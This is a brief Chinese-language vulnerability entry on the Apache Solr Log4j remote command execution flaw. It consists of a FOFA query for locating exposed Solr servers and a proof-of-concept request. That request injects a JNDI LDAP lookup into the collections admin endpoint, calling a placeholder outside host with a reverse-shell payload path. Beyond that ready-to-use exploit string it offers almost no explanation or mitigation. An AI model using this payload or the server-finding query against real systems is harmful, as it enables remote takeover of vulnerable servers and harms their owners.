Apache Solr Log4j组件 远程命令执行漏洞¶

漏洞描述¶

Apache Solr Log4j组件 远程命令执行漏洞，详情略

漏洞影响¶

Apache Solr

网络测绘¶

FOFA: app="APACHE-Solr"

漏洞复现¶

登录页面

验证POC

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json